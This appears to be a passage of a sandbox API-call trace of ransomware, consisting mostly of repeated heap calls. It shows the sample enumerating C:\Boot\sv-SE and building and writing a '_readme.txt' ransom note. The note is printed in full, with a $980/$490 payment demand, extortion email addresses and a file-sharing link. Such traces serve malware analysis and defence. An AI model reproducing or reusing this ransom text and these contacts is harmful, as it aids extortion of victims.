0x2e776e0 [0188.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.594] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.594] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.595] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.596] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.602] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.604] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.604] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.606] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.607] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.607] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.608] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.608] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.609] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.609] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.610] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.610] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0188.611] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.612] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.612] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.613] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0188.613] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0188.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.614] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.614] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.615] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0188.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.616] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.616] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0188.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.617] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.617] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.617] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0188.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.618] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0188.618] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.618] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0188.618] PathFindFileNameW (pszPath="") returned="" [0188.618] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fc0 [0188.618] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0188.619] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0188.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0188.619] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0188.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e776e0 [0188.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83a70 [0188.619] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.619] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83fc0 | out: hHeap=0x620000) returned 1 [0188.620] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0188.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83a70 | out: hHeap=0x620000) returned 1 [0188.620] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0188.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x2e776e0 [0188.621] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0188.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0188.621] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.621] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0188.621] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e96a68 [0188.621] lstrcpyW (in: lpString1=0x2e96a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0188.622] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0188.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0188.622] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0188.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a68 | out: hHeap=0x620000) returned 1 [0188.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0188.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.623] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*" (normalized: "c:\\boot\\sv-se\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0188.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.624] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.624] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83f98 [0188.624] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd80 [0188.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83f98 | out: hHeap=0x620000) returned 1 [0188.624] PathFindExtensionW (pszPath="C:\\Boot\\sv-SE\\bootmgr.exe.mui") returned=".mui" [0188.624] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: 